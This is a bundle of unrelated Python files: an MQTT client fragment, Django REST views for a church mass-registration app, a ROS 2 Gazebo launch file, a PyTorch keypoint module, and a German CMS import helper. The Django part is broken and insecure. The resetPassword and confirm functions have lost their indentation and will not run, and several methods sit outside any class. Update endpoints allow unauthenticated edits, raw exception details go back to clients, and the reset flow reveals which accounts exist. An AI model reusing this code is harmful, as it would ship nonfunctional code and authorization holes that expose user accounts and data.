        # Runs on the paho network thread; releases the wait loop above.
        self.connected_to_mqtt = True
        logger.info("Connected to MQTT broker at %s", self.broker)

    def on_mqtt_disconnect(self, client, userdata, rc):
        self.connected_to_mqtt = False
        logger.warning("MQTT broker disconnected")

    def on_mqtt_message(self, client, config, msg):
        # Forward incoming messages to the user-supplied callback.
        self.mqtt_callback(client, config, msg)

    def publish_message(self, topic, message):
        """Publish `message` on `topic` (default QoS)."""
        self.mq.publish(topic, message)

    def disconnect(self):
        """Stop the network loop and disconnect cleanly."""
        self.mq.loop_stop()
        self.mq.disconnect()
|
from django.db.models import Q
from django.core.exceptions import ObjectDoesNotExist
from django.http import Http404
from django.http import JsonResponse
from django.shortcuts import render, get_object_or_404
from django.utils import timezone
from django.conf import settings
import sys
from rest_framework import viewsets, status
from rest_framework.response import Response
from rest_framework.parsers import JSONParser
from rest_framework.views import APIView
from rest_framework.status import HTTP_200_OK, HTTP_400_BAD_REQUEST
from rest_framework.permissions import AllowAny, IsAuthenticated
from .serializers import (
NewFeedSerializer, DetailNewFeedSerializer, ReMassSerializer, RegistrationSerializer, DailyGospelSerializer, ProvinceSerializer, AccountSerializer, MonthlyTopicBrefSerializer, MonthlyTopicSerializer, ChurchSerializer
)
from .producer import publish
from .permissions import IsOwner
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
from adminapp.models import MonthlyTopic, NewFeed, Mass, DailyGospel, MassTime, Registration, Church, Province
from core.constants import *
from adminapp.common_messages import *
# Create your viewsets here.
class UserIDView(APIView):
    """Return the id of the requesting user."""
    def get(self, request, *args, **kwargs):
        # Single-field payload; id comes straight off request.user.
        payload = {'userID': request.user.id}
        return Response(payload, status=HTTP_200_OK)
# API Discription
# Name: MonthlyTopicViewSet
# Url:
# Detail:
# Requirements:
# Output:
class MonthlyTopicViewSet(viewsets.ViewSet):
    """Read and react to MonthlyTopic posts."""
    permission_classes = (AllowAny,)

    def topic(self, request):  # /api/monthly-topic
        """Return the most recently edited monthly topic."""
        monthlyTopic = MonthlyTopic.objects.all().order_by(
            '-mt_date_edited')[0:1]  # Get the newest post
        serializer = MonthlyTopicBrefSerializer(monthlyTopic, many=True)
        return Response(serializer.data)

    # /api/monthly-topic/<str:month> for more detail.
    def detail(self, request, month=None):
        """Return the full topic for *month*."""
        try:
            # BUG FIX: the original called NewFeed.objects.get(mt_month=...,
            # many=True) - .get() returns a single object and takes no
            # `many` kwarg, and the mt_* fields belong to MonthlyTopic.
            monthlyTopic = MonthlyTopic.objects.get(mt_month=month)
            serializer = MonthlyTopicSerializer(monthlyTopic)
            return Response(serializer.data)
        except Exception:
            print("End retrieve monthly topic error: ", sys.exc_info()[0])
            # BUG FIX: `serializer` was unbound here when the query raised,
            # turning every failure into an UnboundLocalError.
            return Response({'error': 'monthly topic not found'},
                            status=status.HTTP_400_BAD_REQUEST)

    # /api/monthly-topic/<str:month> update like, share ...
    def update(self, request, month=None):
        """Apply a reaction (currently only 'like') to *month*'s topic."""
        try:
            req_auth = request.auth
            # BUG FIX: queried NewFeed for mt_* fields; use MonthlyTopic.
            monthlyTopic = MonthlyTopic.objects.get(mt_month=month)
            if(req_auth):
                req_type = request.data.get('type', '')
                if(req_type):
                    if(req_type == 'like'):
                        monthlyTopic.mt_post_like += 1
                        monthlyTopic.save()
            serializer = MonthlyTopicSerializer(monthlyTopic)
            return Response(serializer.data)
        except Exception:
            print("End update monthly topic error: ", sys.exc_info()[0])
            # BUG FIX: `serializer` could be unbound here; return an
            # explicit error payload instead.
            return Response({'error': 'monthly topic update failed'},
                            status=status.HTTP_400_BAD_REQUEST)
# API Discription
# Name: getNewFeed
# Url:
# Detail:
# Requirements:
# Output:
class NewFeedViewSet(viewsets.ViewSet):
    """List, retrieve and update NewFeed posts."""
    permission_classes = (AllowAny,)

    def getlist(self, request):  # /api/newfeed
        """Return all newfeeds, newest first."""
        newfeeds = NewFeed.objects.all().order_by('-nf_date_edited')
        serializer = NewFeedSerializer(newfeeds, many=True)
        return Response(serializer.data)

    # /api/newfeed/<str:pk> for more detail.
    def retrieve(self, request, pk=None):
        """Return one newfeed by primary key."""
        try:
            newfeed = NewFeed.objects.get(id=pk)
            serializer = DetailNewFeedSerializer(newfeed)
            return Response(serializer.data)
        except Exception:
            print("End retrieve newfeed error: ", sys.exc_info()[0])
            # BUG FIX: `serializer` was unbound when the lookup raised,
            # masking the real error with an UnboundLocalError.
            return Response({'error': 'newfeed not found'},
                            status=status.HTTP_400_BAD_REQUEST)

    def update(self, request, pk=None):  # /api/newfeed/<str:id>
        """Replace a newfeed's fields from the request payload."""
        print("Start update newfeed")
        newfeed = NewFeed.objects.get(id=pk)
        serializer = NewFeedSerializer(instance=newfeed, data=request.data)
        if serializer.is_valid():
            serializer.save()
            print("End update newfeed Successful")
            return Response(serializer.data, status=status.HTTP_202_ACCEPTED)
        else:
            print("End update newfeed error")
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# API Discription
# Name: getChurch
# Url:
# Detail:
# Requirements:
# Output:
class ChurchViewSet(viewsets.ViewSet):
    """List, retrieve and update Church records."""
    permission_classes = (AllowAny,)

    def getlist(self, request):  # /api/church
        """Return all churches."""
        churchs = Church.objects.all()
        serializer = ChurchSerializer(churchs, many=True)
        return Response(serializer.data)

    # /api/church/<str:pk>/detail for more detail.
    def retrieve(self, request, pk=None):
        """Return one church by primary key."""
        try:
            church = Church.objects.get(id=pk)
            serializer = ChurchSerializer(church)
            return Response(serializer.data)
        except Exception:
            print("End retrieve church error: ", sys.exc_info()[0])
            # BUG FIX: `serializer` was unbound when the lookup raised.
            return Response({'error': 'church not found'},
                            status=status.HTTP_400_BAD_REQUEST)

    def update(self, request, pk=None):  # /api/church/<str:id>
        """Replace a church's fields from the request payload."""
        # BUG FIX: this method was copy-pasted from NewFeedViewSet.update and
        # edited NewFeed rows from the church endpoint; it now updates Church.
        print("Start update church")
        church = Church.objects.get(id=pk)
        serializer = ChurchSerializer(instance=church, data=request.data)
        if serializer.is_valid():
            serializer.save()
            print("End update church Successful")
            return Response(serializer.data, status=status.HTTP_202_ACCEPTED)
        else:
            print("End update church error")
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# API Discription
# Name: ReMassListViewSet
# Serializer: ListRegistrationMassSerializer
# Url: /api/getMass
# Detail: Get list registration that are available
# Requirements:
# Output:
class ReMassListViewSet(viewsets.ModelViewSet):
    """Read-only listing of masses open for registration."""
    permission_classes = (AllowAny,)

    def getlist(self, request):  # /api/getMass
        """List all masses, most recent first."""
        ordering = ('-mass_date', '-mass_last_updated_date')
        queryset = Mass.objects.all().order_by(*ordering)
        return Response(ReMassSerializer(queryset, many=True).data)

    # /api/getMass/<str:pk> for more detail.
    def retrieve(self, request, pk=None):
        """Return one mass by primary key."""
        record = Mass.objects.get(id=pk)
        return Response(ReMassSerializer(record).data)
# API Discription
# Name: MassRegister
# Serializer: RegistrationSerializer
# Url: /api/massregister
# Detail: register for attending a Mass with authenticated user.
# Requirements: user is authenticated
# Output:
class MassRegister(viewsets.ViewSet):
    """Registration endpoints for attending a Mass; requires authentication."""
    # NOTE(review): class-level mutable dict - shared by all instances and
    # apparently unused within this class; confirm before removing.
    result = {
        STATUS: OK,
        CONTENT: BLANK,
    }
    permission_classes = (IsAuthenticated,)
    # /api/massregister/ get user's registration history.
    def getlist(self, request, *args, **kwargs):
        try:
            request_user = request.user
            print("Start get "+request_user.username+" registration")
            # Only the requesting user's own registrations are returned.
            registers = Registration.objects.filter(
                registration_user=request_user)
            serializer = RegistrationSerializer(registers, many=True)
            print("End get "+request_user.username+" registration")
            return Response(serializer.data)
        except:
            # NOTE(review): if reading request.user itself failed,
            # request_user is unbound here and this print raises again.
            print("End get "+request_user.username +
                  " registration error: ", sys.exc_info()[0])
            return Response({ERROR: SYSTEM_QUERY_0001}, status=status.HTTP_404_NOT_FOUND)
    def create(self, request):  # /api/massregister/ create a new registration for a mass
        print("Start create new massregister")
        try:
            # Local import; NOTE(review): presumably avoids a circular
            # import at module load time - confirm against .controller.
            from .controller import singleRegister
            request_user = request.user  # get requested user
            # get id of the Mass (mid)
            mass_id = request.data.get(MASS_ID, None)
            print(request_user.username +
                  " request for registration of the Mass: "+str(mass_id))
            # get user condition confirmation [ucondi]
            user_condition = request.data[USERCONDITION]
            # get single register of a Mass for an User
            register = singleRegister(mass_id, user_condition, request_user)
            # status here maybe approved or waiting
            if register[STATUS] != ERROR:
                serializer = RegistrationSerializer(register[RESULT])
                return Response(serializer.data, status=status.HTTP_201_CREATED)
            else:  # Register was error
                return Response(register, status=status.HTTP_400_BAD_REQUEST)
        except:
            print("End get user registration error: ", sys.exc_info()[0])
            return Response({ERROR: "System error"}, status=status.HTTP_404_NOT_FOUND)
    # /api/massregister/<int:rid>/ get registration detail of a user.
    def retrieve(self, request, rid=None):
        try:
            request_user = request.user
            # Scoped to the requesting user so one user cannot read
            # another user's registration.
            registers = Registration.objects.get(
                id=rid, registration_user=request_user)
        except:
            print("End get user registration error: ", sys.exc_info()[0])
            return Response({ERROR: SYSTEM_QUERY_0001}, status=status.HTTP_404_NOT_FOUND)
        serializer = RegistrationSerializer(registers)
        print("End get user registration")
        return Response(serializer.data)
    def update(self, request, pk=None):  # /api/massregister/<str:id>
        # NOTE(review): this method edits Province with ProvinceSerializer -
        # it looks copy-pasted from ProvinceViewSet.update; confirm intent.
        print("Start update Province")
        province = Province.objects.get(id=pk)
        serializer = ProvinceSerializer(instance=province, data=request.data)
        if serializer.is_valid():
            serializer.save()
            # publish('Province_updated',serializer.data)
            print("End update Province Successful")
            return Response(serializer.data, status=status.HTTP_202_ACCEPTED)
        else:
            print("End update error")
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# API Discription
# Name: reMassListViewSet
# Serializer: ListRegistrationMassSerializer
# Url:
# Detail: Get list registration that are available
# Requirements:
# Output:
class GospelViewSet(viewsets.ViewSet):
    """Daily gospel endpoints."""
    def getlist(self, request):  # /api/gospel -- get gospel by next 4 days.
        # NOTE(review): orders DailyGospel by 'nf_date_edited', a name that
        # matches the NewFeed field prefix - confirm the field exists on
        # DailyGospel.
        gospels = DailyGospel.objects.all().order_by('-nf_date_edited')
        serializer = DailyGospelSerializer(gospels, many=True)
        return Response(serializer.data)
    # /api/gospel/<str:pdate> get gospel by date %Y-%m-%d
    def retrieve(self, request, pdate=None):
        # Default to today when no date is supplied.
        # NOTE(review): django.utils.timezone exposes now()/localdate();
        # confirm `timezone.today` exists in this Django version.
        date = timezone.today()
        if pdate:
            date = timezone.datetime.strptime(pdate, "%Y-%m-%d").date()
        # NOTE(review): queries NewFeed (not DailyGospel) and serializes
        # with NewFeedSerializer - looks copy-pasted; verify intended model.
        newfeed = NewFeed.objects.get(daily_gospel_date=date)
        serializer = NewFeedSerializer(newfeed)
        return Response(serializer.data)
# API Discription
# Name: getMassTime
# Serializer: ListRegistrationMassSerializer
# Url:
# Detail: Get list mass schedule
# Requirements:
# Output:
class MassTimeViewSet(viewsets.ViewSet):
    """Mass schedule endpoints."""
    # /api/gospel -- get all masstime available by country code, default = JP
    def getlist(self, request, country="jp"):
        # NOTE(review): `country` is accepted but never used as a filter.
        # NOTE(review): MassTime rows are ordered by an nf_* field and
        # serialized with DailyGospelSerializer - likely copy-paste; confirm.
        listmasstime = MassTime.objects.all().order_by('-nf_date_edited')
        serializer = DailyGospelSerializer(listmasstime, many=True)
        return Response(serializer.data)
    def retrieve(self, request, pk=None):  # /api/gospel/<str:date> get gospel by date
        # Not implemented yet.
        pass
# API Template
class ProvinceViewSet(viewsets.ViewSet):
    """CRUD endpoints for Province records."""
    # BUG FIX: removed a stray class-body print("ProvinceViewSet") that
    # executed as a side effect at import time.

    def getlist(self, request):  # /api/province
        """List all provinces."""
        provinces = Province.objects.all()
        serializer = ProvinceSerializer(provinces, many=True)
        # publish('Province_gets',serializer.data)
        return Response(serializer.data)

    def create(self, request):  # /api/province
        """Create a province from the request payload."""
        print("Start create new Province")
        serializer = ProvinceSerializer(data=request.data)
        if serializer.is_valid():
            serializer.save()
            # publish('Province_created',serializer.data)
            print("End create new Province Successful")
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        else:
            print("End create new error")
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def retrieve(self, request, pk=None):  # /api/province/<str:id>
        """Return one province by primary key."""
        province = Province.objects.get(id=pk)
        serializer = ProvinceSerializer(province)
        return Response(serializer.data)

    def update(self, request, pk=None):  # /api/province/<str:id>
        """Replace a province's fields from the request payload."""
        print("Start update Province")
        province = Province.objects.get(id=pk)
        serializer = ProvinceSerializer(instance=province, data=request.data)
        if serializer.is_valid():
            serializer.save()
            # publish('Province_updated',serializer.data)
            print("End update Province Successful")
            return Response(serializer.data, status=status.HTTP_202_ACCEPTED)
        else:
            print("End update error")
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def destroy(self, request, pk=None):  # /api/province/<str:id>
        """Delete a province; restricted to the MANAGER group."""
        print("Start delete Province")
        if request.user.groups.filter(name=MANAGER).exists():
            province = Province.objects.get(id=pk)
            province.delete()
            # publish('Province_deleted',serializer.data)
            return Response(status=status.HTTP_204_NO_CONTENT)
        else:
            # NOTE(review): 403 Forbidden would describe this better than 400.
            return Response({"error": "You are not Authorized to do this task"}, status=status.HTTP_400_BAD_REQUEST)
# API Discription
# Name: UserCreate
# Serializer:
# Url:
# Detail:
# Requirements:
# Output:
class UserCreate(viewsets.ViewSet):
    """Account creation and password management endpoints."""
    permission_classes = (AllowAny,)
    def create(self, request):  # /api/account/
        """Create a user account and return its DRF auth token.

        On validation failure, the serializer errors are returned instead.
        """
        print("Start create new account")
        serializer = AccountSerializer(data=request.data)
        if serializer.is_valid():
            user = serializer.save()
            # Issue (or reuse) a token for the freshly created user.
            token, created = Token.objects.get_or_create(user=user)
            res = {
                'status': 'ok',
                'data': {
                    'token': token.key,
                    'user_id': user.pk,
                    'confirm': 0,  # account starts unconfirmed
                    'email': user.email
                }
            }
            return Response(res, status=status.HTTP_202_ACCEPTED)
        else:
            res = {
                'status': 'error',
                'message': serializer.errors
            }
            # NOTE(review): 226 IM Used is an unusual status for a
            # validation failure; 400 would be conventional - confirm what
            # clients expect before changing.
            return Response(res, status=status.HTTP_226_IM_USED)
def requestPassword(self, request):
    """Start a password reset: email a reset code to the given address.

    The response 'status' is 'ok' when the mail was sent, ERROR otherwise;
    user-facing messages are in Vietnamese.
    """
    res = {
        'status': 'error',
        'data': {
            'token': '',
            'user_id': '',
            'email': ''
        },
        'message': ''
    }
    try:
        req_email = request.data.get('email', '')
        # Raises User.DoesNotExist when no account matches the email.
        user = User.objects.get(email=req_email)
        if user:
            # Local import; NOTE(review): presumably avoids a circular
            # import at module load time - confirm against .controller.
            from .controller import userRequestResetPass
            if(userRequestResetPass(user, user.username, req_email)):
                res['status'] = 'ok'
                res['message'] = 'Vui lòng kiểm tra hộp thư đến trong email của bạn để đổi mật khẩu.'
                return Response(res, status=status.HTTP_200_OK)
        res['status'] = ERROR
        res['message'] = 'Email này chưa được đăng ký, xin vui lòng kiểm tra lại'
        return Response(res, status=status.HTTP_200_OK)
    except:
        # NOTE(review): bare except also swallows the DoesNotExist above,
        # so unknown emails fall through to the generic error message.
        print("End request reset password error: ", sys.exc_info()[0])
        res['status'] = ERROR
        res['message'] = SYSTEM_QUERY_0001
        return Response(res, status=status.HTTP_200_OK)
def resetPassword(self, request): #
res = {
'status': 'error',
'data': {
'token': '',
'username': '',
'email': ''
},
'message': ''
}
try:
# If authenticated user request reset password.
if(request.auth):
auth_user = request.user
old_password = request.data.get('oldPassword', '')
new_password = request.data.get('newPassword', '')
if(auth_user.check_password(old_password)):
auth_user.set_password(new_password)
auth_user.save()
# Remove security code
userprofile = auth_user.userprofile
userprofile.profile_code = ''
userprofile.save()
token, created = Token.objects.get_or_create(
user=auth_user)
res['status'] = 'ok'
res['data']['token'] = token.key
res['message'] = 'Đổi mật khẩu thành công'
return Response(res, status=status.HTTP_200_OK)
else:
res['status'] = ERROR
res['message'] = 'Mật khẩu cũ không đúng.'
return Response(res, status=status.HTTP_200_OK)
else:
# Else Unauthenticated user request for reseting password from email.
req_usename = request.data.get('username', '')
req_pass = request.data.get('newPassword', '')
re_code = request.data.get('code', '')
user = User.objects.get(username=req_usename)
if user:
userprofile = user.userprofile
if(userprofile.profile_code == re_code):
user.set_password(req_pass)
user.save()
# Remove security code
userprofile = user.userprofile
userprofile.profile_code = ''
userprofile.save()
token, created = Token.objects.get_or_create(user=user)
res['status'] = 'ok'
res['data']['token'] = token.key
res['data']['username'] = req_usename
res['data']['email'] = user.email
res['message'] = 'Đổi mật khẩu thành công'
return Response(res, status=status.HTTP_200_OK)
else:
raise Exception('password', 'Mã bảo mật không đúng')
else:
raise Exception('password', 'Tài khoản không đúng')
except:
print("End request reset password error: ", sys.exc_info()[0])
res['status'] = ERROR
res['message'] = sys.exc_info()
return Response(res, status=status.HTTP_200_OK)
# confirm request api
def confirm(self, request): # /api/account/confirm
res = {
'status': 'error',
'data': {
'token': '',
'username': '',
'confirm': '',
'redirect': ''
},
'message': ''
}
try:
req_usename = request.data.get('username', '')
re_code = request.data.get('code', '')
user = User.objects.get(username=req_usename)
if user:
userprofile = user.userprofile
if(userprofile.profile_code == re_code):
# Remove security code
userprofile = user.userprofile
userprofile.profile_code = ''
userprofile.profile_account_confimred = True
userprofile.save()
token, created = Token.objects.get_or_create(user=user)
res['status'] = 'ok'
res['data']['token'] = token.key
res['data']['username'] = req_usename
res['data']['confirm'] = 1
res['data']['redirect'] = '/account/profile'
res['message'] = 'Xác nhận tài khoản thành công.'
return Response(res, status=status.HTTP_200_OK)
else:
raise Exception('code', 'Mã bảo mật không đúng')
else:
raise Exception('code', 'Tài khoản không đúng')
except:
print("End request reset password error: ", sys.exc_info()[0])
res['status'] = ERROR
res['message'] = sys.exc_info()
return Response(res, status=status.HTTP_200_OK)
# API Description
# Name: UserAPIView
# Serializer:
# Url:
# Detail: placeholder, not implemented yet
# Requirements:
# Output:
class UserAPIView(APIView):
pass
|
# Copyright 2019 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch.actions import DeclareLaunchArgument
from launch.actions import IncludeLaunchDescription
from launch.substitutions import LaunchConfiguration
from launch.launch_description_sources import PythonLaunchDescriptionSource
from launch_ros.actions import Node
def generate_launch_description():
    """Launch Ignition Gazebo with an inline sphere model, RViz and a spawner."""
    # Inline URDF for a single spherical link (the robot name is overridden
    # by the -name argument of the spawner below).
    robot_desc = (
        '<?xml version="1.0" ?>'
        '<robot name="will_be_ignored">'
        '<link name="link">'
        '<visual>'
        '<geometry>'
        '<sphere radius="1.0"/>'
        '</geometry>'
        '</visual>'
        '<collision>'
        '<geometry>'
        '<sphere radius="1.0"/>'
        '</geometry>'
        '</collision>'
        '<inertial>'
        '<mass value="1"/>'
        '<inertia ixx="1" ixy="0.0" ixz="0.0" iyy="1" iyz="0.0" izz="1"/>'
        '</inertial>'
        '</link>'
        '</robot>'
    )

    # Robot state publisher: republishes the URDF on /robot_description.
    rsp_node = Node(
        package='robot_state_publisher',
        executable='robot_state_publisher',
        name='robot_state_publisher',
        output='screen',
        parameters=[{'use_sim_time': True, 'robot_description': robot_desc}],
        arguments=[])

    # Ignition Gazebo, started via the ros_ign_gazebo helper launch file.
    gz_sim = IncludeLaunchDescription(
        PythonLaunchDescriptionSource(
            os.path.join(get_package_share_directory('ros_ign_gazebo'),
                         'launch', 'ign_gazebo.launch.py')),
        launch_arguments={'ign_args': '-r empty.sdf'}.items(),
    )

    # RViz with the demo configuration shipped in ros_ign_gazebo_demos.
    demos_share = get_package_share_directory('ros_ign_gazebo_demos')
    rviz_node = Node(
        package='rviz2',
        executable='rviz2',
        arguments=['-d', os.path.join(demos_share, 'rviz', 'robot_description_publisher.rviz')]
    )

    # Spawn the model into the running simulation from /robot_description.
    spawn_node = Node(
        package='ros_ign_gazebo',
        executable='create',
        arguments=[
            '-name', 'my_custom_model',
            '-x', '1.2',
            '-z', '2.3',
            '-Y', '3.4',
            '-topic', '/robot_description'],
        output='screen')

    # Order preserved from the original: gazebo first, then the helpers.
    return LaunchDescription([
        gz_sim,
        rsp_node,
        rviz_node,
        spawn_node,
    ])
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from MDRSREID.Networks.create_keypoints_predictor import create_keypoints_predictor
from MDRSREID.Networks.HOReID.HeatmapProcessor import HeatmapProcessor2
class HOReIDScoreMapComputer(nn.Module):
    """Turns input images into grouped keypoint score maps for HOReID.

    A keypoints (pose) model predicts per-joint heatmaps, which a
    HeatmapProcessor2 then groups/normalizes into part score maps.
    """

    def __init__(self, cfg):
        super(HOReIDScoreMapComputer, self).__init__()
        self.cfg = cfg
        # init skeleton (pose) model that predicts keypoint heatmaps
        self.keypoints_predictor = create_keypoints_predictor(cfg)
        # Groups/normalizes the raw heatmaps into part score maps;
        # 'sum' group mode and the configured normalization scale.
        self.heatmap_processor = HeatmapProcessor2(cfg=cfg,
                                                   normalize_heatmap=True,
                                                   group_mode='sum',
                                                   norm_scale=cfg.keypoints_model.norm_scale)

    def forward(self, in_dict):
        """
        :param in_dict: dict with 'im' (input images) and 'label'.
        :return: dict with 'label', 'heatmap', and detached 'scoremap'
            [N, 12+1, 16, 8], 'keypoints_condidence' [N, 12+1] and
            'keypoints_location' [N, 17, 2] -- shapes per the original
            author's comments; TODO confirm against HeatmapProcessor2.
        """
        heatmap = self.keypoints_predictor(in_dict['im'])  # per original comment: [N, 17, 64, 32]
        out_dict = {}
        out_dict['label'] = in_dict['label']
        out_dict['heatmap'] = heatmap
        scoremap, keypoints_condidence, keypoints_location = self.heatmap_processor(heatmap)
        # .detach(): downstream consumers must not backprop into the pose model.
        # (dict keys keep the original 'condidence' misspelling -- callers use it)
        out_dict['scoremap'] = scoremap.detach()
        out_dict['keypoints_condidence'] = keypoints_condidence.detach()
        out_dict['keypoints_location'] = keypoints_location.detach()
        return out_dict
|
# -*- coding: utf-8 -*-
"""
/dms/elixier/utils.py
.. enthaelt Hilfefunktionen fuer den Elixier-Austausch
Django content Management System
Hans Rauch
hans.rauch@gmx.net
Die Programme des dms-Systems koennen frei genutzt und den spezifischen
Beduerfnissen entsprechend angepasst werden.
0.01 15.06.2007 Beginn der Arbeit
0.02 19.10.2007 Elixier-Beitraege werden ausgewertet
"""
import string
import datetime
import time
from django.db import transaction
from django.db.models import Q
from django.shortcuts import render_to_response
from django.utils.encoding import smart_unicode
from django.utils.translation import ugettext as _
from dms.roles import require_permission
from dms.settings import EDUFOLDER_BASE_PATH
from dms.models import DmsItemContainer
from dms.utils import show_link
from dms.utils import encode_email
from dms.utils_form import get_item_vars_show
from dms.queries import get_item_container_by_path
#from dms.queries import get_folder_filtered_items
from dms.queries import get_lernrestyp_by_name
from dms.queries import get_medienformat_by_name
from dms.queries import set_extra_data
from dms.queries import get_app
from dms.queries import get_null_license
from dms.queries import get_edu_fach_id_by_name
from dms.queries import get_schulart_id_by_name
from dms.queries import get_schulstufe_id_by_name
from dms.queries import get_edu_sprache_id
from dms.queries import get_zielgruppe_id_by_name
from dms.queries import get_lernrestyp_by_name
from dms.queries import save_item_values
from dms.mail import send_control_email
from dms.edufolder.utils import get_org_image_url
from dms.edufolder.models import DmsEduItem
from dms.edulinkitem.utils import save_schlagworte
from dms.elixier.queries import set_elixier_item_status
from dms.encode_decode import encode_html
from dms.encode_decode import decode_html
from dms_ext.extension import * # dms-Funktionen ueberschreiben
# -----------------------------------------------------
def get_folder_filtered_items(item_container, alpha_mode=False, app_types=[]):
    """Return the non-deleted child item_containers of *item_container*
    whose app name is one of *app_types*, ordered by title.

    alpha_mode is accepted for interface compatibility but unused here.
    """
    # Build an OR filter over all requested app names.
    myQ = None
    for app_name in app_types:
        q = Q(item__app__name=app_name)
        myQ = q if myQ is None else (myQ | q)
    items = DmsItemContainer.objects.select_related().\
            filter(parent_item_id=item_container.item.id).\
            filter(is_deleted=False).\
            exclude(item__app__name='dmsUserFolder').\
            order_by('item__title')
    if myQ is not None:
        # BUGFIX: with an empty app_types list the old code called
        # .filter(None), which raises a TypeError.
        items = items.filter(myQ)
    return items
# -----------------------------------------------------
@require_permission('perm_manage')
def views_select_dest(request, item_container, op):
    """Render the page for choosing the destination (edu) folder."""

    def get_edufolders(dest_folder):
        """Build the HTML overview of the learning archives (edu folders)."""

        def get_link(base_folder, folder, title=''):
            """Assemble one radio button + link for a single folder level."""
            if folder == '':
                folder_name = _(u'oberste Ebene')
            else:
                folder_name = folder
            if title == '':
                title = folder_name
            path = '%s%s/' % (base_folder, folder)
            radio = ''
            radio += '<input type="radio" name="folder_new" value="%s" />\n' % path
            radio += '<a href="?elixier_op=select_dest&select_folder=%s">%s</a>'
            radio = radio % (path, title )
            return radio

        ret = ''
        # --- strip the trailing / before splitting into path components
        folders = string.splitfields(dest_folder[:-1], '/')
        n_current = 1
        base_folder = ''
        # One indented line per ancestor of the currently selected folder.
        for folder in folders:
            ret += '%s %s<br />\n' % (' . '*n_current, get_link(base_folder, folder) )
            base_folder += folder + '/'
            n_current += 1
        # Then list the selectable child edu folders of the selection.
        edu_item_container = get_item_container_by_path(EDUFOLDER_BASE_PATH+dest_folder)
        folders = get_folder_filtered_items(edu_item_container, app_types=['dmsEduFolder'])
        for folder in folders:
            ret += '%s %s<br />\n' % \
                   (' . '*n_current, get_link(base_folder, folder.item.name, folder.item.title))
        return ret

    app_name = 'elixier'
    vars = get_item_vars_show(request, item_container, app_name)
    vars['content_div_style'] = 'frame-util-images'
    vars['no_breadcrumb'] = True
    # Selection priority: explicit GET parameter, then the cookie, then root.
    # (Python 2 code: has_key is intentional here.)
    if request.GET.has_key('select_folder'):
        select_folder = request.GET['select_folder']
    else:
        if request.COOKIES.has_key('elixier_dest_folder'):
            select_folder = request.COOKIES['elixier_dest_folder']
        else:
            select_folder = '/'
    # NOTE(review): mutating request.COOKIES does not set a cookie on the
    # response -- presumably persisted elsewhere; verify.
    request.COOKIES['elixier_dest_folder'] = select_folder
    vars['edufolders'] = get_edufolders(select_folder)
    return render_to_response ( 'app/elixier/select_destination.html', vars )
# -----------------------------------------------------
@require_permission('perm_add')
#@ transaction.commit_manually
def do_check(request, item, item_org, new_status, dest_folder):
    """Set the review status of an Elixier item; if accepted (status 1),
    import it as a dmsEduLinkItem below *dest_folder*.

    The import copies and normalizes the Elixier metadata (resource type,
    subjects, school forms/levels, languages, target groups, keywords),
    falling back to sensible defaults where nothing matches.
    """
    set_elixier_item_status(item, new_status)
    if new_status == 1:
        edu_item_container = get_item_container_by_path(EDUFOLDER_BASE_PATH+dest_folder)
        new = {}
        community_id = 0
        schulverbund_id = 0
        new['is_exchangeable'] = False
        new['string_1'] = decode_html(item_org.quelle_id)
        new['string_2'] = item_org.url_datensatz
        new['integer_1'] = community_id
        new['integer_2'] = schulverbund_id
        # --- resource types come in free form; normalize separators to |
        lernrestypen = item_org.lernressourcentyp.replace(',', '|').replace(';', '|')
        lernrestypen = string.splitfields(lernrestypen, '|')
        found = False
        for lernrestyp in lernrestypen:
            lernrestyp = lernrestyp.strip()
            if lernrestyp != '':
                lernrestyp = get_lernrestyp_by_name(lernrestyp)
                if lernrestyp != -1:
                    new['integer_3'] = lernrestyp.id
                    found = True
        if not found:
            # Default resource type when nothing could be matched.
            new['integer_3'] = get_lernrestyp_by_name(_(u'Arbeitsmaterial')).id
        new['integer_4'] = get_medienformat_by_name(_(u'Online-Ressource')).id
        new['integer_5'] = 1  # zertifikat_id
        # --- keywords: one per line
        schlagworte_raw = item_org.schlagwort.replace(';', '\n').replace(',', '\n')
        schlagworte = ''
        for s in string.splitfields(schlagworte_raw, '\n'):
            s = s.strip()
            if s != '':
                schlagworte += s + '\n'
        new['extra'] = encode_html(set_extra_data(schlagwort_org=schlagworte))
        new['schlagwort'] = schlagworte
        # --- preview image: prefer a scraped image, then the supplied one,
        #     then the source's logo
        image_url, image_url_url, image_extern = get_org_image_url(item_org.url_datensatz)
        if item_org.bild_url == '' and image_url != '':
            new['image_url'] = image_url
            new['image_url_url'] = image_url_url
            new['image_extern'] = image_extern
        elif item_org.bild_url != '':
            new['image_url'] = item_org.bild_url
            new['image_url_url'] = ''
            new['image_extern'] = True
        else:
            new['image_url'] = item_org.quelle_logo_url
            new['image_url_url'] = item_org.quelle_homepage_url
            new['image_extern'] = True
        new['license'] = 1 #get_null_license()
        # Unique item name derived from the current unix timestamp.
        now = smart_unicode(time.time())
        name = 'edu_' + now[:string.find(now, '.')] + '.html'
        new['title'] = decode_html(item_org.titel)
        new['sub_title'] = ''
        new['text'] = decode_html(item_org.beschreibung)
        # problem: the original submitter is not transferred here
        new['text_more'] = ''
        url = item_org.url_ressource.strip()
        if not url.startswith('http://'):
            url = item_org.url_datensatz.strip()
        new['url_more'] = url
        new['url_more_extern'] = True
        new['is_wide'] = True
        new['is_important'] = False
        new['info_slot_right'] = ''
        new['has_user_support'] = False
        new['has_comments'] = edu_item_container.item.has_comments
        new['is_moderated'] = edu_item_container.item.is_moderated
        item_container_new = save_item_values(request.user, 'dmsEduLinkItem', name, new,
                                              edu_item_container, True, False)
        new['autor'] = decode_html(item_org.autor)
        new['herausgeber'] = decode_html(item_org.herausgeber)
